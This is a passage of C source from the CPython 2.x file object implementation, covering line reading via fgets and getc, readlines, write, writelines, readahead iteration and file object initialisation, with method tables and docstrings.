isn't clear about this: in those cases where fgets writes something into the buffer, can it write into any position beyond the required trailing null byte? MSVC 6 fgets does not, and no platform is (yet) known on which it does; and it would be a strange way to code fgets. Still, getline_via_fgets may not work correctly if it does. The std test test_bufio.py should fail if platform fgets() routinely writes beyond the trailing null byte. #define DONT_USE_FGETS_IN_GETLINE to disable this code. **************************************************************************/ /* Use this routine if told to, or by default on non-get_unlocked() * platforms unless told not to. Yikes! Let's spell that out: * On a platform with getc_unlocked(): * By default, use getc_unlocked(). * If you want to use fgets() instead, #define USE_FGETS_IN_GETLINE. * On a platform without getc_unlocked(): * By default, use fgets(). * If you don't want to use fgets(), #define DONT_USE_FGETS_IN_GETLINE. */ #if !defined(USE_FGETS_IN_GETLINE) && !defined(HAVE_GETC_UNLOCKED) #define USE_FGETS_IN_GETLINE #endif #if defined(DONT_USE_FGETS_IN_GETLINE) && defined(USE_FGETS_IN_GETLINE) #undef USE_FGETS_IN_GETLINE #endif #ifdef USE_FGETS_IN_GETLINE static PyObject* getline_via_fgets(PyFileObject *f, FILE *fp) { /* INITBUFSIZE is the maximum line length that lets us get away with the fast * no-realloc, one-fgets()-call path. Boosting it isn't free, because we have * to fill this much of the buffer with a known value in order to figure out * how much of the buffer fgets() overwrites. So if INITBUFSIZE is larger * than "most" lines, we waste time filling unused buffer slots. 100 is * surely adequate for most peoples' email archives, chewing over source code, * etc -- "regular old text files". * MAXBUFSIZE is the maximum line length that lets us get away with the less * fast (but still zippy) no-realloc, two-fgets()-call path. See above for * cautions about boosting that. 300 was chosen because the worst real-life * text-crunching job reported on Python-Dev was a mail-log crawler where over * half the lines were 254 chars. */ #define INITBUFSIZE 100 #define MAXBUFSIZE 300 char* p; /* temp */ char buf[MAXBUFSIZE]; PyObject* v; /* the string object result */ char* pvfree; /* address of next free slot */ char* pvend; /* address one beyond last free slot */ size_t nfree; /* # of free buffer slots; pvend-pvfree */ size_t total_v_size; /* total # of slots in buffer */ size_t increment; /* amount to increment the buffer */ size_t prev_v_size; /* Optimize for normal case: avoid _PyString_Resize if at all * possible via first reading into stack buffer "buf". */ total_v_size = INITBUFSIZE; /* start small and pray */ pvfree = buf; for (;;) { FILE_BEGIN_ALLOW_THREADS(f) pvend = buf + total_v_size; nfree = pvend - pvfree; memset(pvfree, '\n', nfree); assert(nfree < INT_MAX); /* Should be atmost MAXBUFSIZE */ p = fgets(pvfree, (int)nfree, fp); FILE_END_ALLOW_THREADS(f) if (p == NULL) { clearerr(fp); if (PyErr_CheckSignals()) return NULL; v = PyString_FromStringAndSize(buf, pvfree - buf); return v; } /* fgets read *something* */ p = memchr(pvfree, '\n', nfree); if (p != NULL) { /* Did the \n come from fgets or from us? * Since fgets stops at the first \n, and then writes * \0, if it's from fgets a \0 must be next. But if * that's so, it could not have come from us, since * the \n's we filled the buffer with have only more * \n's to the right. */ if (p+1 < pvend && *(p+1) == '\0') { /* It's from fgets: we win! In particular, * we haven't done any mallocs yet, and can * build the final result on the first try. */ ++p; /* include \n from fgets */ } else { /* Must be from us: fgets didn't fill the * buffer and didn't find a newline, so it * must be the last and newline-free line of * the file. */ assert(p > pvfree && *(p-1) == '\0'); --p; /* don't include \0 from fgets */ } v = PyString_FromStringAndSize(buf, p - buf); return v; } /* yuck: fgets overwrote all the newlines, i.e. the entire * buffer. So this line isn't over yet, or maybe it is but * we're exactly at EOF. If we haven't already, try using the * rest of the stack buffer. */ assert(*(pvend-1) == '\0'); if (pvfree == buf) { pvfree = pvend - 1; /* overwrite trailing null */ total_v_size = MAXBUFSIZE; } else break; } /* The stack buffer isn't big enough; malloc a string object and read * into its buffer. */ total_v_size = MAXBUFSIZE << 1; v = PyString_FromStringAndSize((char*)NULL, (int)total_v_size); if (v == NULL) return v; /* copy over everything except the last null byte */ memcpy(BUF(v), buf, MAXBUFSIZE-1); pvfree = BUF(v) + MAXBUFSIZE - 1; /* Keep reading stuff into v; if it ever ends successfully, break * after setting p one beyond the end of the line. The code here is * very much like the code above, except reads into v's buffer; see * the code above for detailed comments about the logic. */ for (;;) { FILE_BEGIN_ALLOW_THREADS(f) pvend = BUF(v) + total_v_size; nfree = pvend - pvfree; memset(pvfree, '\n', nfree); assert(nfree < INT_MAX); p = fgets(pvfree, (int)nfree, fp); FILE_END_ALLOW_THREADS(f) if (p == NULL) { clearerr(fp); if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } p = pvfree; break; } p = memchr(pvfree, '\n', nfree); if (p != NULL) { if (p+1 < pvend && *(p+1) == '\0') { /* \n came from fgets */ ++p; break; } /* \n came from us; last line of file, no newline */ assert(p > pvfree && *(p-1) == '\0'); --p; break; } /* expand buffer and try again */ assert(*(pvend-1) == '\0'); increment = total_v_size >> 2; /* mild exponential growth */ prev_v_size = total_v_size; total_v_size += increment; /* check for overflow */ if (total_v_size <= prev_v_size || total_v_size > PY_SSIZE_T_MAX) { PyErr_SetString(PyExc_OverflowError, "line is longer than a Python string can hold"); Py_DECREF(v); return NULL; } if (_PyString_Resize(&v, (int)total_v_size) < 0) return NULL; /* overwrite the trailing null byte */ pvfree = BUF(v) + (prev_v_size - 1); } if (BUF(v) + total_v_size != p && _PyString_Resize(&v, p - BUF(v))) return NULL; return v; #undef INITBUFSIZE #undef MAXBUFSIZE } #endif /* ifdef USE_FGETS_IN_GETLINE */ /* Internal routine to get a line. Size argument interpretation: > 0: max length; <= 0: read arbitrary line */ static PyObject * get_line(PyFileObject *f, int n) { FILE *fp = f->f_fp; int c; char *buf, *end; size_t total_v_size; /* total # of slots in buffer */ size_t used_v_size; /* # used slots in buffer */ size_t increment; /* amount to increment the buffer */ PyObject *v; int newlinetypes = f->f_newlinetypes; int skipnextlf = f->f_skipnextlf; int univ_newline = f->f_univ_newline; #if defined(USE_FGETS_IN_GETLINE) if (n <= 0 && !univ_newline ) return getline_via_fgets(f, fp); #endif total_v_size = n > 0 ? n : 100; v = PyString_FromStringAndSize((char *)NULL, total_v_size); if (v == NULL) return NULL; buf = BUF(v); end = buf + total_v_size; for (;;) { FILE_BEGIN_ALLOW_THREADS(f) FLOCKFILE(fp); if (univ_newline) { c = 'x'; /* Shut up gcc warning */ while ( buf != end && (c = GETC(fp)) != EOF ) { if (skipnextlf ) { skipnextlf = 0; if (c == '\n') { /* Seeing a \n here with * skipnextlf true means we * saw a \r before. */ newlinetypes |= NEWLINE_CRLF; c = GETC(fp); if (c == EOF) break; } else { newlinetypes |= NEWLINE_CR; } } if (c == '\r') { skipnextlf = 1; c = '\n'; } else if ( c == '\n') newlinetypes |= NEWLINE_LF; *buf++ = c; if (c == '\n') break; } if (c == EOF) { if (ferror(fp) && errno == EINTR) { FUNLOCKFILE(fp); FILE_ABORT_ALLOW_THREADS(f) f->f_newlinetypes = newlinetypes; f->f_skipnextlf = skipnextlf; if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } /* We executed Python signal handlers and got no exception. * Now back to reading the line where we left off. */ clearerr(fp); continue; } if (skipnextlf) newlinetypes |= NEWLINE_CR; } } else /* If not universal newlines use the normal loop */ while ((c = GETC(fp)) != EOF && (*buf++ = c) != '\n' && buf != end) ; FUNLOCKFILE(fp); FILE_END_ALLOW_THREADS(f) f->f_newlinetypes = newlinetypes; f->f_skipnextlf = skipnextlf; if (c == '\n') break; if (c == EOF) { if (ferror(fp)) { if (errno == EINTR) { if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } /* We executed Python signal handlers and got no exception. * Now back to reading the line where we left off. */ clearerr(fp); continue; } PyErr_SetFromErrno(PyExc_IOError); clearerr(fp); Py_DECREF(v); return NULL; } clearerr(fp); if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } break; } /* Must be because buf == end */ if (n > 0) break; used_v_size = total_v_size; increment = total_v_size >> 2; /* mild exponential growth */ total_v_size += increment; if (total_v_size > PY_SSIZE_T_MAX) { PyErr_SetString(PyExc_OverflowError, "line is longer than a Python string can hold"); Py_DECREF(v); return NULL; } if (_PyString_Resize(&v, total_v_size) < 0) return NULL; buf = BUF(v) + used_v_size; end = BUF(v) + total_v_size; } used_v_size = buf - BUF(v); if (used_v_size != total_v_size && _PyString_Resize(&v, used_v_size)) return NULL; return v; } /* External C interface */ PyObject * PyFile_GetLine(PyObject *f, int n) { PyObject *result; if (f == NULL) { PyErr_BadInternalCall(); return NULL; } if (PyFile_Check(f)) { PyFileObject *fo = (PyFileObject *)f; if (fo->f_fp == NULL) return err_closed(); if (!fo->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (fo->f_buf != NULL && (fo->f_bufend - fo->f_bufptr) > 0 && fo->f_buf[0] != '\0') return err_iterbuffered(); result = get_line(fo, n); } else { PyObject *reader; PyObject *args; reader = PyObject_GetAttrString(f, "readline"); if (reader == NULL) return NULL; if (n <= 0) args = PyTuple_New(0); else args = Py_BuildValue("(i)", n); if (args == NULL) { Py_DECREF(reader); return NULL; } result = PyEval_CallObject(reader, args); Py_DECREF(reader); Py_DECREF(args); if (result != NULL && !PyString_Check(result) && !PyUnicode_Check(result)) { Py_DECREF(result); result = NULL; PyErr_SetString(PyExc_TypeError, "object.readline() returned non-string"); } } if (n < 0 && result != NULL && PyString_Check(result)) { char *s = PyString_AS_STRING(result); Py_ssize_t len = PyString_GET_SIZE(result); if (len == 0) { Py_DECREF(result); result = NULL; PyErr_SetString(PyExc_EOFError, "EOF when reading a line"); } else if (s[len-1] == '\n') { if (result->ob_refcnt == 1) { if (_PyString_Resize(&result, len-1)) return NULL; } else { PyObject *v; v = PyString_FromStringAndSize(s, len-1); Py_DECREF(result); result = v; } } } #ifdef Py_USING_UNICODE if (n < 0 && result != NULL && PyUnicode_Check(result)) { Py_UNICODE *s = PyUnicode_AS_UNICODE(result); Py_ssize_t len = PyUnicode_GET_SIZE(result); if (len == 0) { Py_DECREF(result); result = NULL; PyErr_SetString(PyExc_EOFError, "EOF when reading a line"); } else if (s[len-1] == '\n') { if (result->ob_refcnt == 1) PyUnicode_Resize(&result, len-1); else { PyObject *v; v = PyUnicode_FromUnicode(s, len-1); Py_DECREF(result); result = v; } } } #endif return result; } /* Python method */ static PyObject * file_readline(PyFileObject *f, PyObject *args) { int n = -1; if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (f->f_buf != NULL && (f->f_bufend - f->f_bufptr) > 0 && f->f_buf[0] != '\0') return err_iterbuffered(); if (!PyArg_ParseTuple(args, "|i:readline", &n)) return NULL; if (n == 0) return PyString_FromString(""); if (n < 0) n = 0; return get_line(f, n); } static PyObject * file_readlines(PyFileObject *f, PyObject *args) { long sizehint = 0; PyObject *list = NULL; PyObject *line; char small_buffer[SMALLCHUNK]; char *buffer = small_buffer; size_t buffersize = SMALLCHUNK; PyObject *big_buffer = NULL; size_t nfilled = 0; size_t nread; size_t totalread = 0; char *p, *q, *end; int err; int shortread = 0; /* bool, did the previous read come up short? */ if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (f->f_buf != NULL && (f->f_bufend - f->f_bufptr) > 0 && f->f_buf[0] != '\0') return err_iterbuffered(); if (!PyArg_ParseTuple(args, "|l:readlines", &sizehint)) return NULL; if ((list = PyList_New(0)) == NULL) return NULL; for (;;) { if (shortread) nread = 0; else { FILE_BEGIN_ALLOW_THREADS(f) errno = 0; nread = Py_UniversalNewlineFread(buffer+nfilled, buffersize-nfilled, f->f_fp, (PyObject *)f); FILE_END_ALLOW_THREADS(f) shortread = (nread < buffersize-nfilled); } if (nread == 0) { sizehint = 0; if (!ferror(f->f_fp)) break; if (errno == EINTR) { if (PyErr_CheckSignals()) { goto error; } clearerr(f->f_fp); shortread = 0; continue; } PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); goto error; } totalread += nread; p = (char *)memchr(buffer+nfilled, '\n', nread); if (p == NULL) { /* Need a larger buffer to fit this line */ nfilled += nread; buffersize *= 2; if (buffersize > PY_SSIZE_T_MAX) { PyErr_SetString(PyExc_OverflowError, "line is longer than a Python string can hold"); goto error; } if (big_buffer == NULL) { /* Create the big buffer */ big_buffer = PyString_FromStringAndSize( NULL, buffersize); if (big_buffer == NULL) goto error; buffer = PyString_AS_STRING(big_buffer); memcpy(buffer, small_buffer, nfilled); } else { /* Grow the big buffer */ if ( _PyString_Resize(&big_buffer, buffersize) < 0 ) goto error; buffer = PyString_AS_STRING(big_buffer); } continue; } end = buffer+nfilled+nread; q = buffer; do { /* Process complete lines */ p++; line = PyString_FromStringAndSize(q, p-q); if (line == NULL) goto error; err = PyList_Append(list, line); Py_DECREF(line); if (err != 0) goto error; q = p; p = (char *)memchr(q, '\n', end-q); } while (p != NULL); /* Move the remaining incomplete line to the start */ nfilled = end-q; memmove(buffer, q, nfilled); if (sizehint > 0) if (totalread >= (size_t)sizehint) break; } if (nfilled != 0) { /* Partial last line */ line = PyString_FromStringAndSize(buffer, nfilled); if (line == NULL) goto error; if (sizehint > 0) { /* Need to complete the last line */ PyObject *rest = get_line(f, 0); if (rest == NULL) { Py_DECREF(line); goto error; } PyString_Concat(&line, rest); Py_DECREF(rest); if (line == NULL) goto error; } err = PyList_Append(list, line); Py_DECREF(line); if (err != 0) goto error; } cleanup: Py_XDECREF(big_buffer); return list; error: Py_CLEAR(list); goto cleanup; } static PyObject * file_write(PyFileObject *f, PyObject *args) { Py_buffer pbuf; const char *s; Py_ssize_t n, n2; PyObject *encoded = NULL; int err_flag = 0, err; if (f->f_fp == NULL) return err_closed(); if (!f->writable) return err_mode("writing"); if (f->f_binary) { if (!PyArg_ParseTuple(args, "s*", &pbuf)) return NULL; s = pbuf.buf; n = pbuf.len; } else { PyObject *text; if (!PyArg_ParseTuple(args, "O", &text)) return NULL; if (PyString_Check(text)) { s = PyString_AS_STRING(text); n = PyString_GET_SIZE(text); #ifdef Py_USING_UNICODE } else if (PyUnicode_Check(text)) { const char *encoding, *errors; if (f->f_encoding != Py_None) encoding = PyString_AS_STRING(f->f_encoding); else encoding = PyUnicode_GetDefaultEncoding(); if (f->f_errors != Py_None) errors = PyString_AS_STRING(f->f_errors); else errors = "strict"; encoded = PyUnicode_AsEncodedString(text, encoding, errors); if (encoded == NULL) return NULL; s = PyString_AS_STRING(encoded); n = PyString_GET_SIZE(encoded); #endif } else { if (PyObject_AsCharBuffer(text, &s, &n)) return NULL; } } f->f_softspace = 0; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; n2 = fwrite(s, 1, n, f->f_fp); if (n2 != n || ferror(f->f_fp)) { err_flag = 1; err = errno; } FILE_END_ALLOW_THREADS(f) Py_XDECREF(encoded); if (f->f_binary) PyBuffer_Release(&pbuf); if (err_flag) { errno = err; PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } Py_INCREF(Py_None); return Py_None; } static PyObject * file_writelines(PyFileObject *f, PyObject *seq) { #define CHUNKSIZE 1000 PyObject *list, *line; PyObject *it; /* iter(seq) */ PyObject *result; int index, islist; Py_ssize_t i, j, nwritten, len; assert(seq != NULL); if (f->f_fp == NULL) return err_closed(); if (!f->writable) return err_mode("writing"); result = NULL; list = NULL; islist = PyList_Check(seq); if (islist) it = NULL; else { it = PyObject_GetIter(seq); if (it == NULL) { PyErr_SetString(PyExc_TypeError, "writelines() requires an iterable argument"); return NULL; } /* From here on, fail by going to error, to reclaim "it". */ list = PyList_New(CHUNKSIZE); if (list == NULL) goto error; } /* Strategy: slurp CHUNKSIZE lines into a private list, checking that they are all strings, then write that list without holding the interpreter lock, then come back for more. */ for (index = 0; ; index += CHUNKSIZE) { if (islist) { Py_XDECREF(list); list = PyList_GetSlice(seq, index, index+CHUNKSIZE); if (list == NULL) goto error; j = PyList_GET_SIZE(list); } else { for (j = 0; j < CHUNKSIZE; j++) { line = PyIter_Next(it); if (line == NULL) { if (PyErr_Occurred()) goto error; break; } PyList_SetItem(list, j, line); } /* The iterator might have closed the file on us. */ if (f->f_fp == NULL) { err_closed(); goto error; } } if (j == 0) break; /* Check that all entries are indeed strings. If not, apply the same rules as for file.write() and convert the results to strings. This is slow, but seems to be the only way since all conversion APIs could potentially execute Python code. */ for (i = 0; i < j; i++) { PyObject *v = PyList_GET_ITEM(list, i); if (!PyString_Check(v)) { const char *buffer; int res; if (f->f_binary) { res = PyObject_AsReadBuffer(v, (const void**)&buffer, &len); } else { res = PyObject_AsCharBuffer(v, &buffer, &len); } if (res) { PyErr_SetString(PyExc_TypeError, "writelines() argument must be a sequence of strings"); goto error; } line = PyString_FromStringAndSize(buffer, len); if (line == NULL) goto error; Py_DECREF(v); PyList_SET_ITEM(list, i, line); } } /* Since we are releasing the global lock, the following code may *not* execute Python code. */ f->f_softspace = 0; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; for (i = 0; i < j; i++) { line = PyList_GET_ITEM(list, i); len = PyString_GET_SIZE(line); nwritten = fwrite(PyString_AS_STRING(line), 1, len, f->f_fp); if (nwritten != len) { FILE_ABORT_ALLOW_THREADS(f) PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); goto error; } } FILE_END_ALLOW_THREADS(f) if (j < CHUNKSIZE) break; } Py_INCREF(Py_None); result = Py_None; error: Py_XDECREF(list); Py_XDECREF(it); return result; #undef CHUNKSIZE } static PyObject * file_self(PyFileObject *f) { if (f->f_fp == NULL) return err_closed(); Py_INCREF(f); return (PyObject *)f; } static PyObject * file_xreadlines(PyFileObject *f) { if (PyErr_WarnPy3k("f.xreadlines() not supported in 3.x, " "try 'for line in f' instead", 1) < 0) return NULL; return file_self(f); } static PyObject * file_exit(PyObject *f, PyObject *args) { PyObject *ret = PyObject_CallMethod(f, "close", NULL); if (!ret) /* If error occurred, pass through */ return NULL; Py_DECREF(ret); /* We cannot return the result of close since a true * value will be interpreted as "yes, swallow the * exception if one was raised inside the with block". */ Py_RETURN_NONE; } PyDoc_STRVAR(readline_doc, "readline([size]) -> next line from the file, as a string.\n" "\n" "Retain newline. A non-negative size argument limits the maximum\n" "number of bytes to return (an incomplete line may be returned then).\n" "Return an empty string at EOF."); PyDoc_STRVAR(read_doc, "read([size]) -> read at most size bytes, returned as a string.\n" "\n" "If the size argument is negative or omitted, read until EOF is reached.\n" "Notice that when in non-blocking mode, less data than what was requested\n" "may be returned, even if no size parameter was given."); PyDoc_STRVAR(write_doc, "write(str) -> None. Write string str to file.\n" "\n" "Note that due to buffering, flush() or close() may be needed before\n" "the file on disk reflects the data written."); PyDoc_STRVAR(fileno_doc, "fileno() -> integer \"file descriptor\".\n" "\n" "This is needed for lower-level file interfaces, such os.read()."); PyDoc_STRVAR(seek_doc, "seek(offset[, whence]) -> None. Move to new file position.\n" "\n" "Argument offset is a byte count. Optional argument whence defaults to\n" "0 (offset from start of file, offset should be >= 0); other values are 1\n" "(move relative to current position, positive or negative), and 2 (move\n" "relative to end of file, usually negative, although many platforms allow\n" "seeking beyond the end of a file). If the file is opened in text mode,\n" "only offsets returned by tell() are legal. Use of other offsets causes\n" "undefined behavior." "\n" "Note that not all file objects are seekable."); #ifdef HAVE_FTRUNCATE PyDoc_STRVAR(truncate_doc, "truncate([size]) -> None. Truncate the file to at most size bytes.\n" "\n" "Size defaults to the current file position, as returned by tell()."); #endif PyDoc_STRVAR(tell_doc, "tell() -> current file position, an integer (may be a long integer)."); PyDoc_STRVAR(readinto_doc, "readinto() -> Undocumented. Don't use this; it may go away."); PyDoc_STRVAR(readlines_doc, "readlines([size]) -> list of strings, each a line from the file.\n" "\n" "Call readline() repeatedly and return a list of the lines so read.\n" "The optional size argument, if given, is an approximate bound on the\n" "total number of bytes in the lines returned."); PyDoc_STRVAR(xreadlines_doc, "xreadlines() -> returns self.\n" "\n" "For backward compatibility. File objects now include the performance\n" "optimizations previously implemented in the xreadlines module."); PyDoc_STRVAR(writelines_doc, "writelines(sequence_of_strings) -> None. Write the strings to the file.\n" "\n" "Note that newlines are not added. The sequence can be any iterable object\n" "producing strings. This is equivalent to calling write() for each string."); PyDoc_STRVAR(flush_doc, "flush() -> None. Flush the internal I/O buffer."); PyDoc_STRVAR(close_doc, "close() -> None or (perhaps) an integer. Close the file.\n" "\n" "Sets data attribute .closed to True. A closed file cannot be used for\n" "further I/O operations. close() may be called more than once without\n" "error. Some kinds of file objects (for example, opened by popen())\n" "may return an exit status upon closing."); PyDoc_STRVAR(isatty_doc, "isatty() -> true or false. True if the file is connected to a tty device."); PyDoc_STRVAR(enter_doc, "__enter__() -> self."); PyDoc_STRVAR(exit_doc, "__exit__(*excinfo) -> None. Closes the file."); static PyMethodDef file_methods[] = { {"readline", (PyCFunction)file_readline, METH_VARARGS, readline_doc}, {"read", (PyCFunction)file_read, METH_VARARGS, read_doc}, {"write", (PyCFunction)file_write, METH_VARARGS, write_doc}, {"fileno", (PyCFunction)file_fileno, METH_NOARGS, fileno_doc}, {"seek", (PyCFunction)file_seek, METH_VARARGS, seek_doc}, #ifdef HAVE_FTRUNCATE {"truncate", (PyCFunction)file_truncate, METH_VARARGS, truncate_doc}, #endif {"tell", (PyCFunction)file_tell, METH_NOARGS, tell_doc}, {"readinto", (PyCFunction)file_readinto, METH_VARARGS, readinto_doc}, {"readlines", (PyCFunction)file_readlines, METH_VARARGS, readlines_doc}, {"xreadlines",(PyCFunction)file_xreadlines, METH_NOARGS, xreadlines_doc}, {"writelines",(PyCFunction)file_writelines, METH_O, writelines_doc}, {"flush", (PyCFunction)file_flush, METH_NOARGS, flush_doc}, {"close", (PyCFunction)file_close, METH_NOARGS, close_doc}, {"isatty", (PyCFunction)file_isatty, METH_NOARGS, isatty_doc}, {"__enter__", (PyCFunction)file_self, METH_NOARGS, enter_doc}, {"__exit__", (PyCFunction)file_exit, METH_VARARGS, exit_doc}, {NULL, NULL} /* sentinel */ }; #define OFF(x) offsetof(PyFileObject, x) static PyMemberDef file_memberlist[] = { {"mode", T_OBJECT, OFF(f_mode), RO, "file mode ('r', 'U', 'w', 'a', possibly with 'b' or '+' added)"}, {"name", T_OBJECT, OFF(f_name), RO, "file name"}, {"encoding", T_OBJECT, OFF(f_encoding), RO, "file encoding"}, {"errors", T_OBJECT, OFF(f_errors), RO, "Unicode error handler"}, /* getattr(f, "closed") is implemented without this table */ {NULL} /* Sentinel */ }; static PyObject * get_closed(PyFileObject *f, void *closure) { return PyBool_FromLong((long)(f->f_fp == 0)); } static PyObject * get_newlines(PyFileObject *f, void *closure) { switch (f->f_newlinetypes) { case NEWLINE_UNKNOWN: Py_INCREF(Py_None); return Py_None; case NEWLINE_CR: return PyString_FromString("\r"); case NEWLINE_LF: return PyString_FromString("\n"); case NEWLINE_CR|NEWLINE_LF: return Py_BuildValue("(ss)", "\r", "\n"); case NEWLINE_CRLF: return PyString_FromString("\r\n"); case NEWLINE_CR|NEWLINE_CRLF: return Py_BuildValue("(ss)", "\r", "\r\n"); case NEWLINE_LF|NEWLINE_CRLF: return Py_BuildValue("(ss)", "\n", "\r\n"); case NEWLINE_CR|NEWLINE_LF|NEWLINE_CRLF: return Py_BuildValue("(sss)", "\r", "\n", "\r\n"); default: PyErr_Format(PyExc_SystemError, "Unknown newlines value 0x%x\n", f->f_newlinetypes); return NULL; } } static PyObject * get_softspace(PyFileObject *f, void *closure) { if (PyErr_WarnPy3k("file.softspace not supported in 3.x", 1) < 0) return NULL; return PyInt_FromLong(f->f_softspace); } static int set_softspace(PyFileObject *f, PyObject *value) { int new; if (PyErr_WarnPy3k("file.softspace not supported in 3.x", 1) < 0) return -1; if (value == NULL) { PyErr_SetString(PyExc_TypeError, "can't delete softspace attribute"); return -1; } new = PyInt_AsLong(value); if (new == -1 && PyErr_Occurred()) return -1; f->f_softspace = new; return 0; } static PyGetSetDef file_getsetlist[] = { {"closed", (getter)get_closed, NULL, "True if the file is closed"}, {"newlines", (getter)get_newlines, NULL, "end-of-line convention used in this file"}, {"softspace", (getter)get_softspace, (setter)set_softspace, "flag indicating that a space needs to be printed; used by print"}, {0}, }; typedef struct { char *buf, *bufptr, *bufend; } readaheadbuffer; static void drop_readaheadbuffer(readaheadbuffer *rab) { if (rab->buf != NULL) { PyMem_FREE(rab->buf); rab->buf = NULL; } } /* Make sure that file has a readahead buffer with at least one byte (unless at EOF) and no more than bufsize. Returns negative value on error, will set MemoryError if bufsize bytes cannot be allocated. */ static int readahead(PyFileObject *f, readaheadbuffer *rab, Py_ssize_t bufsize) { Py_ssize_t chunksize; if (rab->buf != NULL) { if ((rab->bufend - rab->bufptr) >= 1) return 0; else drop_readaheadbuffer(rab); } if ((rab->buf = PyMem_MALLOC(bufsize)) == NULL) { PyErr_NoMemory(); return -1; } FILE_BEGIN_ALLOW_THREADS(f) errno = 0; chunksize = Py_UniversalNewlineFread(rab->buf, bufsize, f->f_fp, (PyObject *)f); FILE_END_ALLOW_THREADS(f) if (chunksize == 0) { if (ferror(f->f_fp)) { PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); drop_readaheadbuffer(rab); return -1; } } rab->bufptr = rab->buf; rab->bufend = rab->buf + chunksize; return 0; } /* Used by file_iternext. The returned string will start with 'skip' uninitialized bytes followed by the remainder of the line. Don't be horrified by the recursive call: maximum recursion depth is limited by logarithmic buffer growth to about 50 even when reading a 1gb line. */ static PyStringObject * readahead_get_line_skip(PyFileObject *f, readaheadbuffer *rab, Py_ssize_t skip, Py_ssize_t bufsize) { PyStringObject* s; char *bufptr; char *buf; Py_ssize_t len; if (rab->buf == NULL) if (readahead(f, rab, bufsize) < 0) return NULL; len = rab->bufend - rab->bufptr; if (len == 0) return (PyStringObject *)PyString_FromStringAndSize(NULL, skip); bufptr = (char *)memchr(rab->bufptr, '\n', len); if (bufptr != NULL) { bufptr++; /* Count the '\n' */ len = bufptr - rab->bufptr; s = (PyStringObject *)PyString_FromStringAndSize(NULL, skip + len); if (s == NULL) return NULL; memcpy(PyString_AS_STRING(s) + skip, rab->bufptr, len); rab->bufptr = bufptr; if (bufptr == rab->bufend) drop_readaheadbuffer(rab); } else { bufptr = rab->bufptr; buf = rab->buf; rab->buf = NULL; /* Force new readahead buffer */ assert(len <= PY_SSIZE_T_MAX - skip); s = readahead_get_line_skip(f, rab, skip + len, bufsize + (bufsize>>2)); if (s == NULL) { PyMem_FREE(buf); return NULL; } memcpy(PyString_AS_STRING(s) + skip, bufptr, len); PyMem_FREE(buf); } return s; } /* A larger buffer size may actually decrease performance. */ #define READAHEAD_BUFSIZE 8192 static PyObject * file_iternext(PyFileObject *f) { PyStringObject* l; if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); { /* Multiple threads can enter this method while the GIL is released during file read and wreak havoc on the file object's readahead buffer. To avoid dealing with cross-thread coordination issues, we cache the file buffer state locally and only set it back on the file object when we're done. */ readaheadbuffer rab = {f->f_buf, f->f_bufptr, f->f_bufend}; f->f_buf = NULL; l = readahead_get_line_skip(f, &rab, 0, READAHEAD_BUFSIZE); /* Make sure the file's internal read buffer is cleared out. This will only do anything if some other thread interleaved with us during readahead. We want to drop any changeling buffer, so we don't leak memory. We may lose data, but that's what you get for reading the same file object in multiple threads. */ drop_file_readahead(f); f->f_buf = rab.buf; f->f_bufptr = rab.bufptr; f->f_bufend = rab.bufend; } if (l == NULL || PyString_GET_SIZE(l) == 0) { Py_XDECREF(l); return NULL; } return (PyObject *)l; } static PyObject * file_new(PyTypeObject *type, PyObject *args, PyObject *kwds) { PyObject *self; static PyObject *not_yet_string; assert(type != NULL && type->tp_alloc != NULL); if (not_yet_string == NULL) { not_yet_string = PyString_InternFromString("<uninitialized file>"); if (not_yet_string == NULL) return NULL; } self = type->tp_alloc(type, 0); if (self != NULL) { /* Always fill in the name and mode, so that nobody else needs to special-case NULLs there. */ Py_INCREF(not_yet_string); ((PyFileObject *)self)->f_name = not_yet_string; Py_INCREF(not_yet_string); ((PyFileObject *)self)->f_mode = not_yet_string; Py_INCREF(Py_None); ((PyFileObject *)self)->f_encoding = Py_None; Py_INCREF(Py_None); ((PyFileObject *)self)->f_errors = Py_None; ((PyFileObject *)self)->weakreflist = NULL; ((PyFileObject *)self)->unlocked_count = 0; } return self; } static int file_init(PyObject *self, PyObject *args, PyObject *kwds) { PyFileObject *foself = (PyFileObject *)self; int ret = 0; static char *kwlist[] = {"name", "mode", "buffering", 0}; char *name = NULL; char *mode = "r"; int bufsize = -1; int wideargument = 0; #ifdef MS_WINDOWS PyObject *po; #endif assert(PyFile_Check(self)); if (foself->f_fp != NULL) { /* Have to close the existing file first. */ PyObject *closeresult = file_close(foself); if (closeresult == NULL) return -1; Py_DECREF(closeresult); } #ifdef MS_WINDOWS if (PyArg_ParseTupleAndKeywords(args, kwds, "U|si:file", kwlist, &po, &mode, &bufsize) && wcslen(PyUnicode_AS_UNICODE(po)) == (size_t)PyUnicode_GET_SIZE(po)) { wideargument = 1; if (fill_file_fields(foself, NULL, po, mode, fclose) == NULL) goto Error; } else { /* Drop the argument parsing error as narrow strings are also valid. */ PyErr_Clear(); } #endif if (!wideargument) { PyObject *o_name; if (!PyArg_ParseTupleAndKeywords(args, kwds, "et|si:file", kwlist, Py_FileSystemDefaultEncoding, &name, &mode, &bufsize)) return -1; /* We parse again to get the name as a PyObject */ if (!PyArg_ParseTupleAndKeywords(args, kwds, "O|si:file", kwlist, &o_name, &mode, &bufsize)) goto Error; if (fill_file_fields(foself, NULL, o_name, mode, fclose) == NULL) goto Error; } if (open_the_file(foself, name, mode) == NULL) goto Error; foself->f_setbuf = NULL; PyFile_SetBufSize(self, bufsize); goto Done; Error: ret = -1; /* fall through */ Done: PyMem_Free(name); /* free the encoded string */ return ret; } PyDoc_VAR(file_doc) = PyDoc_STR( "file(name[, mode[, buffering]]) -> file object\n" "\n" "Open a file. The mode can be 'r', 'w' or 'a' for reading (default),\n" "writing or appending. The file will be created if it 